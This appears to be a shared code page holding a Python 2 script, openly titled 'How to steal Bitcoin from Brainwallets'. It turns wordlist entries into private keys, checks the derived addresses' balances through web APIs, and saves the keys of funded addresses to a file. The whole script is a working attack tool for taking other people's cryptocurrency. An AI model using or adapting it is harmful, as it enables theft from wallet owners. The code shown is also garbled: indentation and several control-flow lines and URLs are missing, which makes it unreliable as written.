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Last active March 15, 2019 08:13
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How to steal Bitcoin from Brainwallets.
import urllib2, hashlib, argparse, sys, time, ast
from pycoin import ecdsa, encoding
parser = argparse.ArgumentParser(description='How to steal Bitcoin from Brainwallets')
parser.add_argument('--s', metavar='\"string\"', help='Check a string.', default=False)
parser.add_argument('--f', metavar='<file>', help='Process a wordlist.', default=False)
parser.add_argument('--l', metavar='line', help='Line in file to start at.', default=False)
args = parser.parse_args()
def findKeys(toHash):
secretKey = hashlib.sha256(toHash).hexdigest()
secret_exponent= int('0x'+secretKey, 0)
secretWIF = encoding.secret_exponent_to_wif(secret_exponent, compressed=False)
public_pair = ecdsa.public_pair_for_secret_exponent(ecdsa.secp256k1.generator_secp256k1, secret_exponent)
hash160c = encoding.hash160_sec_to_bitcoin_address(encoding.public_pair_to_hash160_sec(public_pair, compressed=True))
hash160u = encoding.hash160_sec_to_bitcoin_address(encoding.public_pair_to_hash160_sec(public_pair, compressed=False))
return (secretKey, secretWIF, hash160u, hash160c)
def checkBalance(address, source=0):
if source == 2:
#Free: 2000 Requests Per Day - 200 Requests Per Hour - 3 Requests Per Second
url = '' + address + '/balance'
req = urllib2.Request(url, headers={ 'User-Agent': 'Mozilla/5.0' })
response = ast.literal_eval(urllib2.urlopen(req).read()).get('balance')
if source == 1:
#Unregistered: 700 Requests Per 5 Minutes - 28800 Requests per 8 Hours - ?? per Second
url = '' + address + '?confirmations=3'
url = ''+address+'/balance'
req = urllib2.Request(url, headers={ 'User-Agent': 'Mozilla/5.0' })
response = urllib2.urlopen(req).read()
except urllib2.HTTPError as e:
if e.code == 429:
print str(e) + ', waiting 15 minutes.'
response = checkBalance(address)
print str(e) + ', waiting 5 seconds.'
response = checkBalance(address)
return response
if args.s:
keys = findKeys(args.s)
#print checkBalance2(keys[2])
val1, val2 = checkBalance(keys[2],2), checkBalance(keys[3],2)
print '\nString: ' + args.s
print 'Secret: ' + keys[0]
print 'WIF: ' + keys[1] + '\n'
print 'Balance: ' + '{0:.8f}'.format(float(val1) / 100000000) + ' BTC @ Addr: '+keys[2]
print 'Balance: ' + '{0:.8f}'.format(float(val2) / 100000000) + ' BTC @ Addr: '+keys[3] + '\n'
if args.f:
if args.l:
startline = int(args.l)
startline = 1
with open(args.f) as text:
for i in xrange(startline-1):
for code in text:
count = 0
code = code.rstrip()
keys = findKeys(code)
if count <= 10:
val1, val2 = checkBalance(keys[2],1), checkBalance(keys[3])
count = 0
val1, val2 = checkBalance(keys[2]), checkBalance(keys[3])
count += 1
if ((int(val1)+int(val2)) > 0):
print 'Line: ' + str(startline) + ' -- Word: ' + code + ' !! BITCOINS !!'
f = open('found_btc.txt', 'a+')
f.write('Line: ' + str(startline) + ' -- Word: ' + code + '\n')
f.write('Secret: ' + keys[0] + '\n')
f.write('WIF: ' + keys[1] + '\n')
f.write('Balance: ' + '{0:.8f}'.format(float(val1) / 100000000) + ' BTC @ Addr: '+keys[2] + '\n')
f.write('Balance: ' + '{0:.8f}'.format(float(val2) / 100000000) + ' BTC @ Addr: '+keys[3] + '\n\n')
print 'Line: ' + str(startline) + ' -- Word: ' + code
print 'Balance: ' + '{0:.8f}'.format(float(val1) / 100000000) + ' BTC @ Addr: '+keys[2]
print 'Balance: ' + '{0:.8f}'.format(float(val2) / 100000000) + ' BTC @ Addr: '+keys[3]
startline += 1
if len(sys.argv)==1:
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